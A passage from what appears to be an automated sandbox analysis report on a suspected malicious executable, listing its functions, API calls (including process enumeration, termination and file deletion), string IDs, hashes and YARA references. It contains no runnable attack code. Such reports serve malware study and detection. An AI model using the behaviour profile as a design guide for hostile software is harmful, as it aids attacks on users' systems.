                                                                                                                                            • ReleaseDC.USER32 ref: 0045C234
                                                                                                                                              • Part of subcall function 0045EF7B: __EH_prolog3_GS.LIBCMT ref: 0045EF85
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CapsDeviceH_prolog3_$CreateRelease_memmove
                                                                                                                                            • String ID: DISPLAY
                                                                                                                                            • API String ID: 3322158219-865373369
                                                                                                                                            • Opcode ID: 43de00317dbd47d0b3997444e8ac7a2e24d36e7f5cea90831c7628ea02889e0e
                                                                                                                                            • Instruction ID: 2c5b49098f08bb6245cb5d25be0f8d71ce77842a499dff928f5cb0dae86d7b9c
                                                                                                                                            • Opcode Fuzzy Hash: 43de00317dbd47d0b3997444e8ac7a2e24d36e7f5cea90831c7628ea02889e0e
                                                                                                                                            • Instruction Fuzzy Hash: 642183B1800218BACB61AB66CC49FDF7A7CEF95304F10806AF509B3191DE744A45CBB4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0046A0D1, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __CreateFrameInfo.LIBCMT ref: 0046A0F9
                                                                                                                                              • Part of subcall function 00464EFC: __getptd.LIBCMT ref: 00464F0A
                                                                                                                                              • Part of subcall function 00464EFC: __getptd.LIBCMT ref: 00464F18
                                                                                                                                            • __getptd.LIBCMT ref: 0046A103
                                                                                                                                              • Part of subcall function 0046D13D: __getptd_noexit.LIBCMT ref: 0046D140
                                                                                                                                              • Part of subcall function 0046D13D: __amsg_exit.LIBCMT ref: 0046D14D
                                                                                                                                            • __getptd.LIBCMT ref: 0046A111
                                                                                                                                            • __getptd.LIBCMT ref: 0046A11F
                                                                                                                                            • __getptd.LIBCMT ref: 0046A12A
                                                                                                                                            • _CallCatchBlock2.LIBCMT ref: 0046A150
                                                                                                                                              • Part of subcall function 00464FA1: __CallSettingFrame@12.LIBCMT ref: 00464FED
                                                                                                                                              • Part of subcall function 0046A1F7: __getptd.LIBCMT ref: 0046A206
                                                                                                                                              • Part of subcall function 0046A1F7: __getptd.LIBCMT ref: 0046A214
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1602911419-0
                                                                                                                                            • Opcode ID: 79741013915353943c4d613792eb9cec35ba927ebb9f2a70a8b817062f6d6f8f
                                                                                                                                            • Instruction ID: 832aa0cfc236b32d965729579b0412b1b120d8f143555ced3fb66b14d4a39180
                                                                                                                                            • Opcode Fuzzy Hash: 79741013915353943c4d613792eb9cec35ba927ebb9f2a70a8b817062f6d6f8f
                                                                                                                                            • Instruction Fuzzy Hash: EE11F9B1D00209DFDF00EFA5C845ADE7BB0FF45314F11806AF854A7251EB7899519F55
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0042A6B7, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 200COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fprintf_l
                                                                                                                                            • String ID: %!.15g$%!.20e$NULL
                                                                                                                                            • API String ID: 3906573944-1578054726
                                                                                                                                            • Opcode ID: 20ebb4c4a03221dc50833c795a96a0d0d6f5c30c4d418ea585f39028d3851475
                                                                                                                                            • Instruction ID: 39ea24d3660a38a803a6985f6565fea62677e8da5a69ac1ef1948aec022b0321
                                                                                                                                            • Opcode Fuzzy Hash: 20ebb4c4a03221dc50833c795a96a0d0d6f5c30c4d418ea585f39028d3851475
                                                                                                                                            • Instruction Fuzzy Hash: 8C519F71A042559BD714AB74EC427BE77B4EF00304FA8445FF98097282DA7D8967835E
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00426352, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __aulldvrm$__aullrem
                                                                                                                                            • String ID: -x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                            • API String ID: 643879872-3011028180
                                                                                                                                            • Opcode ID: b65e78430ec287595772aba8a5210e11ded0c8c0a647b60c5fa6dc9bf69e5ce9
                                                                                                                                            • Instruction ID: 92be71944473be129dd11e1cc2f43bac74f754da64dca517a4dc07c4df9954fc
                                                                                                                                            • Opcode Fuzzy Hash: b65e78430ec287595772aba8a5210e11ded0c8c0a647b60c5fa6dc9bf69e5ce9
                                                                                                                                            • Instruction Fuzzy Hash: 2461D671B04269AEDF11DF68E5407EE7BB1AF45304F5A809BEC84AB342D238CD85CB59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00448070, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove
                                                                                                                                            • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                            • API String ID: 4104443479-3170954634
                                                                                                                                            • Opcode ID: 75f9840a5f3ddccc510649be6d8fc378444c687241977ca289bd1ef687ed98f9
                                                                                                                                            • Instruction ID: e60fffb86198f9a242633cfe69f81aea8f7531aedd252a67603e5f6028481f59
                                                                                                                                            • Opcode Fuzzy Hash: 75f9840a5f3ddccc510649be6d8fc378444c687241977ca289bd1ef687ed98f9
                                                                                                                                            • Instruction Fuzzy Hash: 5461E475A043198BDB14DF69C841BADBBB1BF44318F15409FE859AB342DB39EC81CB88
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040E5E7, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0040E5EE
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000012,0000005C,0040FCA4,00000001,?,00000104,0000002C), ref: 0040E687
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040E68E
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040E6D9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$AllocH_prolog3_Process_strcpy_s
                                                                                                                                            • String ID: 0123456789ABCDEF
                                                                                                                                            • API String ID: 794038625-2554083253
                                                                                                                                            • Opcode ID: 5a244857fefe2ea51c984035644705f3f7925ec911f05c2a92a3e152b6d93ee7
                                                                                                                                            • Instruction ID: 52b5105fac4cd7d0d7f3b394285dd8b65478aab1af06231455282c8c493ecac6
                                                                                                                                            • Opcode Fuzzy Hash: 5a244857fefe2ea51c984035644705f3f7925ec911f05c2a92a3e152b6d93ee7
                                                                                                                                            • Instruction Fuzzy Hash: E731BD729002159FDB05DFA8CC58A9E77B5AF05304F50056AE800FB2D1EB7ADE09CB58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0046A47E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 0046A491
                                                                                                                                              • Part of subcall function 0046A3EC: ___BuildCatchObjectHelper.LIBCMT ref: 0046A422
                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0046A4A8
                                                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 0046A4B6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                            • String ID: csm$csm
                                                                                                                                            • API String ID: 2163707966-3733052814
                                                                                                                                            • Opcode ID: e8a6e813e412bf367160559bba328109c73219c77f70575c0fd0987e217682d1
                                                                                                                                            • Instruction ID: 93249f9dd29635c6147d873a1ebb93dc177460ac05ad158a8c1bbf431ebf37a9
                                                                                                                                            • Opcode Fuzzy Hash: e8a6e813e412bf367160559bba328109c73219c77f70575c0fd0987e217682d1
                                                                                                                                            • Instruction Fuzzy Hash: FC01E871001509BFDF12AE51CD45EAA7F6AFF04354F008016FD1825261EB7A99B1DFAB
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00466495, Relevance: 7.7, APIs: 5, Instructions: 160COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4048096073-0
                                                                                                                                            • Opcode ID: 0ef62f90d5bff5073d2e4fddbf1474667191eb68ad9451a6ceb75154929082dd
                                                                                                                                            • Instruction ID: 2c4057cfd0166198495782e209134aef8fe4b28fdc423f3119e0fcbbe777e150
                                                                                                                                            • Opcode Fuzzy Hash: 0ef62f90d5bff5073d2e4fddbf1474667191eb68ad9451a6ceb75154929082dd
                                                                                                                                            • Instruction Fuzzy Hash: 3051E970A00205EFCB208FA9E94569EB771AF40324F16822BE82562390F738DE51CF5F
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0042C2C8, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 450COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: P$P$t
                                                                                                                                            • API String ID: 0-459111052
                                                                                                                                            • Opcode ID: a68063dfff2fe5a5311948c5d78dbf15e51fe6c66819e677e19e33fde3668e77
                                                                                                                                            • Instruction ID: f04ca17abe71a9abbc0b59750564faf780d4068d57b341dd4e0c707c0fcf6871
                                                                                                                                            • Opcode Fuzzy Hash: a68063dfff2fe5a5311948c5d78dbf15e51fe6c66819e677e19e33fde3668e77
                                                                                                                                            • Instruction Fuzzy Hash: E4124970A00225DFCB11CF59D5C0AAEBBB1FF48314FA4859AE9059B312D379E991CF98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004366FF, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 171COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset
                                                                                                                                            • String ID: %s-shm$winOpenShm$B
                                                                                                                                            • API String ID: 2102423945-2110620802
                                                                                                                                            • Opcode ID: 3f7edb2aa144e31c0b02452d713b95a3800133879d435afc7a682949c94cc6a6
                                                                                                                                            • Instruction ID: 9d071b359b8e236e5972e7735fa23aaad7948b8f24a809c03f2e3df462a01caf
                                                                                                                                            • Opcode Fuzzy Hash: 3f7edb2aa144e31c0b02452d713b95a3800133879d435afc7a682949c94cc6a6
                                                                                                                                            • Instruction Fuzzy Hash: 24511671204302BBEB14BF61DC42B9B37D5AF08718F10452FF9419A2C1EBA9E951975D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045C2CE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0045C2ED
                                                                                                                                            • _memset.LIBCMT ref: 0045C31C
                                                                                                                                            • GetUserDefaultLocaleName.KERNEL32(?,00000055,?,?,00000008), ref: 0045C32A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DefaultH_prolog3LocaleNameUser_memset
                                                                                                                                            • String ID: Unknown
                                                                                                                                            • API String ID: 1926270201-1654365787
                                                                                                                                            • Opcode ID: 6d000a2f91108a1c2543300dc917c3af54d3b318a076c4f87acf5ef43470d013
                                                                                                                                            • Instruction ID: bbc0568c1d4cc483bcf7143025dcd0846dc7626d5b68284f2fcb9405d44ed163
                                                                                                                                            • Opcode Fuzzy Hash: 6d000a2f91108a1c2543300dc917c3af54d3b318a076c4f87acf5ef43470d013
                                                                                                                                            • Instruction Fuzzy Hash: 9231837051024CAFDB15EF65CD91ADEBBA8EF14308F40402FF84697281DBB8AA4CCB95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0042418F, Relevance: 6.2, APIs: 4, Instructions: 174COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove$_memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1357608183-0
                                                                                                                                            • Opcode ID: c17e47cc91f52d06b4f89a408b0285517442fc4917201b68cc3f44adff04e5b9
                                                                                                                                            • Instruction ID: 689965cc77faed9ed263710a6ea79d71d010ca60d266d95b328d9f23da474df1
                                                                                                                                            • Opcode Fuzzy Hash: c17e47cc91f52d06b4f89a408b0285517442fc4917201b68cc3f44adff04e5b9
                                                                                                                                            • Instruction Fuzzy Hash: FD51C0B1A00619EFDB10DFA5DC41BAEBBB5FF84314F04802AF91996250D338EA60CB95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00468269, Relevance: 6.2, APIs: 4, Instructions: 173COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00468277
                                                                                                                                              • Part of subcall function 0046598C: __getptd.LIBCMT ref: 0046599F
                                                                                                                                              • Part of subcall function 0046AAAD: __getptd_noexit.LIBCMT ref: 0046AAAD
                                                                                                                                            • __stricmp_l.LIBCMT ref: 004682E4
                                                                                                                                              • Part of subcall function 00465A4C: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00465A5B
                                                                                                                                            • ___crtLCMapStringA.LIBCMT ref: 0046833A
                                                                                                                                            • ___crtLCMapStringA.LIBCMT ref: 004683BB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$StringUpdateUpdate::____crt$__getptd__getptd_noexit__stricmp_l
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2544346105-0
                                                                                                                                            • Opcode ID: ff7a6a820197fe63b1fb0880241f5c9719f5c42c8cc32d8078132542b99ded6e
                                                                                                                                            • Instruction ID: 6b30b74452a5bb22b65d3d960f342df08c6af7b5cc82139775638ac108d59fe6
                                                                                                                                            • Opcode Fuzzy Hash: ff7a6a820197fe63b1fb0880241f5c9719f5c42c8cc32d8078132542b99ded6e
                                                                                                                                            • Instruction Fuzzy Hash: FF516E708042459BDB258B54C485BBE7BB0AB01314F28439FE4A25B2D2FF398D82D757
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040444B, Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00404452
                                                                                                                                            • _strtok.LIBCMT ref: 00404466
                                                                                                                                              • Part of subcall function 0046577D: __getptd.LIBCMT ref: 0046579B
                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,00481844,00000001,00000000,?,?,?,?,?,?,00000024), ref: 004044A4
                                                                                                                                            • _strtok.LIBCMT ref: 004044AF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strtok$CreateDirectoryH_prolog3___getptd
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2807274917-0
                                                                                                                                            • Opcode ID: facf1c1c87d2fe51250336f5f8375eebe3e8c78d99da8387b7f2edbcac278d95
                                                                                                                                            • Instruction ID: 63bdacfe391d8ead855c52e4469a9503b3607e536589c34165486631e7661fb9
                                                                                                                                            • Opcode Fuzzy Hash: facf1c1c87d2fe51250336f5f8375eebe3e8c78d99da8387b7f2edbcac278d95
                                                                                                                                            • Instruction Fuzzy Hash: B5014CB1D04209AADB04EBA5EC86AEE7778EB04304F50842FF211B61C1EA7855488B69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040C35C, Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040C26E: _malloc.LIBCMT ref: 0040C29B
                                                                                                                                              • Part of subcall function 0040C26E: CreateToolhelp32Snapshot.KERNEL32 ref: 0040C2AE
                                                                                                                                              • Part of subcall function 0040C26E: CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 0040C2BB
                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?), ref: 0040C381
                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?), ref: 0040C391
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0040C398
                                                                                                                                            • _free.LIBCMT ref: 0040C3A6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandleProcess$CreateOpenSnapshotTerminateToolhelp32_free_malloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 486718275-0
                                                                                                                                            • Opcode ID: f21e4d964b39594af2e2517edf28d413c03317be66f5e15cc28255515eb509de
                                                                                                                                            • Instruction ID: 2676d608881d5e6933817558b75eed85066a8e76d1c15ffaa7294ed4ec6b9f61
                                                                                                                                            • Opcode Fuzzy Hash: f21e4d964b39594af2e2517edf28d413c03317be66f5e15cc28255515eb509de
                                                                                                                                            • Instruction Fuzzy Hash: 59F0E932100118BBD7112BB4DCC9E6E3B5CDB45B64F108236FE19A61D1D674989286A8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040E109, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                            • Opcode ID: fab16285dad8a2032e18d3499b996349744210feb5e20633e880a28afb695950
                                                                                                                                            • Instruction ID: bcfdea70c255a73ad351b441265ca6aba5eca424d13b48231f8513a3a7cf2a31
                                                                                                                                            • Opcode Fuzzy Hash: fab16285dad8a2032e18d3499b996349744210feb5e20633e880a28afb695950
                                                                                                                                            • Instruction Fuzzy Hash: CA516C31900205DFCF14CBAAC880AAEB7B9BF59314F10897FE552BB2C1D778A954CB59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004027C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004027D3
                                                                                                                                              • Part of subcall function 0046336A: std::exception::exception.LIBCMT ref: 0046337F
                                                                                                                                              • Part of subcall function 0046336A: __CxxThrowException@8.LIBCMT ref: 00463394
                                                                                                                                              • Part of subcall function 0046336A: std::exception::exception.LIBCMT ref: 004633A5
                                                                                                                                            • _memmove.LIBCMT ref: 0040280E
                                                                                                                                            Strings
                                                                                                                                            • invalid string position, xrefs: 004027CE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                            • String ID: invalid string position
                                                                                                                                            • API String ID: 1785806476-1799206989
                                                                                                                                            • Opcode ID: b95216a30c8efb663d752c475ce253d04213428aa35c1c8f89662d7e281b502a
                                                                                                                                            • Instruction ID: f4c0ae3b6158b54634a40d3f8c75501dc643c8f37536f4c71b8784dcea37aa44
                                                                                                                                            • Opcode Fuzzy Hash: b95216a30c8efb663d752c475ce253d04213428aa35c1c8f89662d7e281b502a
                                                                                                                                            • Instruction Fuzzy Hash: A301F9323042004BC3249D2CDAC841BB3E6B7857007204D3FD441976C1DBB8EC4683A9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040C08A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040C0F7
                                                                                                                                              • Part of subcall function 0046647E: __fsopen.LIBCMT ref: 0046648B
                                                                                                                                            • _fprintf.LIBCMT ref: 0040C0C2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DeleteFile__fsopen_fprintf
                                                                                                                                            • String ID: %s
                                                                                                                                            • API String ID: 634087206-620797490
                                                                                                                                            • Opcode ID: 91e4f5f2dd2261033f046855ee6ad60d2af1c3f3e3f569b4b03d5ac55605b623
                                                                                                                                            • Instruction ID: 6465aa94ed1f46d8083c13fa1f1ad9ff578f3b53dfbfd2a79b15080988b8395c
                                                                                                                                            • Opcode Fuzzy Hash: 91e4f5f2dd2261033f046855ee6ad60d2af1c3f3e3f569b4b03d5ac55605b623
                                                                                                                                            • Instruction Fuzzy Hash: 6E01A7729041089AEF317BB2EC829FE3B299B01314F20003FF401B61A3ED7D5955965D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0046A1F7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00464F4F: __getptd.LIBCMT ref: 00464F55
                                                                                                                                              • Part of subcall function 00464F4F: __getptd.LIBCMT ref: 00464F65
                                                                                                                                            • __getptd.LIBCMT ref: 0046A206
                                                                                                                                              • Part of subcall function 0046D13D: __getptd_noexit.LIBCMT ref: 0046D140
                                                                                                                                              • Part of subcall function 0046D13D: __amsg_exit.LIBCMT ref: 0046D14D
                                                                                                                                            • __getptd.LIBCMT ref: 0046A214
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                            • String ID: csm
                                                                                                                                            • API String ID: 803148776-1018135373
                                                                                                                                            • Opcode ID: 75f08d937a20f7e2fef1405e4484d4e1cf98d534b760b736f1f6156732ee2ea9
                                                                                                                                            • Instruction ID: 68f3d71b92c13945f3790bc9d34d5010a2546137ba0e1ce122df7d91a8f8bd03
                                                                                                                                            • Opcode Fuzzy Hash: 75f08d937a20f7e2fef1405e4484d4e1cf98d534b760b736f1f6156732ee2ea9
                                                                                                                                            • Instruction Fuzzy Hash: 5501D1309467058BCF38AF61C4506AEB7B5AF01711F5815AFE441A7391EB3AADA0CF4B
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004026D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::exception::exception.LIBCMT ref: 00402701
                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00402716
                                                                                                                                              • Part of subcall function 00464B51: _malloc.LIBCMT ref: 00464B6B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                            • String ID: P&@
                                                                                                                                            • API String ID: 4063778783-654259478
                                                                                                                                            • Opcode ID: 8ae9e51fb37fb778db5c17b2fa3c2946ea368f7b88283d6cd2dd57d8d9b36606
                                                                                                                                            • Instruction ID: 0e68f1544cb17e49ff4787802a96a0309a03322795984bd2c49f3ee1b444caf7
                                                                                                                                            • Opcode Fuzzy Hash: 8ae9e51fb37fb778db5c17b2fa3c2946ea368f7b88283d6cd2dd57d8d9b36606
                                                                                                                                            • Instruction Fuzzy Hash: 5BE0E5309002096ACF04FEA5C455EDE37AC6F4071CF10417FE421E20C0EB78E6448759
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Analysis Process: M7WCJ84VE5TXJ0R4.exe PID: 6780 Parent PID: 6924 M7WCJ84VE5TXJ0R4.exeCOMMON

                                                                                                                                            Executed Functions

                                                                                                                                            Function 00411081, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,00411080,?,?,?,?,?,00412132), ref: 004110A3
                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00411080,?,?,?,?,?,00412132), ref: 004110AA
                                                                                                                                            • ExitProcess.KERNEL32 ref: 004110BC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                            • Opcode ID: 3eade875429b4c25a88e23b0c1fba08e4b47918bb5697763b1cada1f7b41c300
                                                                                                                                            • Instruction ID: 50680f15ab9b15ff87f6c82859258ed70eac0a4c7dfe96ecd2ef0c59ded76f42
                                                                                                                                            • Opcode Fuzzy Hash: 3eade875429b4c25a88e23b0c1fba08e4b47918bb5697763b1cada1f7b41c300
                                                                                                                                            • Instruction Fuzzy Hash: 86E04F31500184ABCF216F14CC09E993F68FB44741B410425FA0487632CB39EDD2CA9D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

